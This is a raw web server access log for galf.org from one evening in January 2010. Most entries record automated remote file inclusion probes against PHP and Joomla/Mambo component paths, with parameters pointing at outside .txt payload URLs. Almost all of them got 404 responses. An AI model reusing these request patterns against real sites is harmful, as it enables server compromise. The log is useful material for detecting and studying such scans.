87.250.252.242 - - [31/Jan/2010:16:13:06 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 6858611 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:14:46 -0800] "GET /index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:14:46 -0800] "GET /logs/access_090720.log//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:14:46 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:15:04 -0800] "GET /index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:15:04 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:16:15:24 -0800] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:16:15:24 -0800] "GET /logs/access_091012.log/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:16:15:24 -0800] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:13 -0800] "GET /logs/access_090720.log//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:28 -0800] "GET /logs/access_090720.log//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:28 -0800] "GET /index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:28 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:30 -0800] "GET /index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:30 -0800] "GET /logs/access_090720.log//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.63.235.157 - - [31/Jan/2010:16:16:30 -0800] "GET /logs//index.php?option=com_custompages&cpage=http://bustednbroke.com/alwnc/copyright.txt???? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:16:23:36 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:16:23:36 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:16:23:36 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:16:23:51 -0800] "GET /logs/access_090720.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:16:28:31 -0800] "GET /logs/access_090720.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:18 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:18 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:18 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:18 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:21 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:21 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:21 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:21 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:30 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:30 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:30 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:33:30 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:35 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:36 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:39 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:51 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:53 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:16:35:55 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.138 - - [31/Jan/2010:16:45:13 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /logs/access.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
78.110.50.121 - - [31/Jan/2010:16:46:28 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
205.251.134.1 - - [31/Jan/2010:16:49:45 -0800] "GET /logs/access_090803.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:16:49:45 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:16:49:45 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:16:49:56 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:16:49:57 -0800] "GET /logs/access_090803.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:16:49:57 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:16:51:39 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:16:51:52 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:00:25 -0800] "GET /logs/access_091012.log/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:00:25 -0800] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:00:25 -0800] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.flashweb.co.il/mambo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:04:12 -0800] "GET /logs/access_091012.log/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:04:12 -0800] "GET /plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [31/Jan/2010:17:04:12 -0800] "GET /logs/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:50 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:50 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:50 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:55 -0800] "GET /logs///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:55 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
78.110.50.121 - - [31/Jan/2010:17:04:55 -0800] "GET //write_comment_update.php?board_skin_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [31/Jan/2010:17:05:08 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 6411322 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:13:50 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:13:50 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:13:51 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:17:13:56 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:17:13:56 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:17:13:56 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:14 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:14 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:15 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:17:14:17 -0800] "GET /logs/access_090720.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:44 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:44 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:45 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:50 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:54 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:54 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:14:54 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:15:01 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:17:11 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:17:46 -0800] "GET /logs/access_090907.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:17:19:08 -0800] "GET /logs/access_090720.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [31/Jan/2010:17:20:30 -0800] "GET /logs/access.log//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:20:30 -0800] "GET /logs//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:20:30 -0800] "GET /developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:21:27 -0800] "GET /developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [31/Jan/2010:17:21:27 -0800] "GET /logs//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.193.131.164 - - [31/Jan/2010:17:21:28 -0800] "GET /logs/access_100125.log%20%20//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.35 - - [31/Jan/2010:17:21:37 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=23&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; InfoPath.1; yplus 5.1.02b)" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:02 -0800] "GET /logs/access.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:02 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:02 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:14 -0800] "GET /logs/access.log/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:14 -0800] "GET /logs/?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:17:24:14 -0800] "GET /?sourcedir=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:26:13 -0800] "GET /logs//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:26:13 -0800] "GET /developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.193.131.164 - - [31/Jan/2010:17:26:13 -0800] "GET /logs/access.log//developpement-logiciel//components/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://med.buu.ac.th///components/com_mylink/son1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
205.251.134.1 - - [31/Jan/2010:17:37:51 -0800] "GET /logs/access.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:17:37:51 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:17:37:51 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
205.251.134.1 - - [31/Jan/2010:17:37:52 -0800] "GET /logs/access_090907.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:17:38:24 -0800] "GET /logs/access.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:17:38:24 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:17:38:24 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
216.14.122.238 - - [31/Jan/2010:17:38:24 -0800] "GET /logs/access_090907.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.chevreuse-courtage.com/info.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
65.55.106.109 - - [31/Jan/2010:17:39:13 -0800] "GET /labia/?S=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.113.224 - - [31/Jan/2010:17:55:14 -0800] "GET /tmp/?M=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.250.252.242 - - [31/Jan/2010:18:01:03 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:18:03:21 -0800] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:18:03:21 -0800] "GET /logs/access_091102.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:18:03:21 -0800] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:18:03:41 -0800] "GET /logs/access_090720.log%20%20///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.98.5 - - [31/Jan/2010:18:08:01 -0800] "GET /logs/access_090720.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.tripezimoveis.com/phplive/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.39 - - [31/Jan/2010:18:17:11 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=50&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR={87426856-BBF9-4b17-A17C-5B5666BFCA85}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.galf.org"
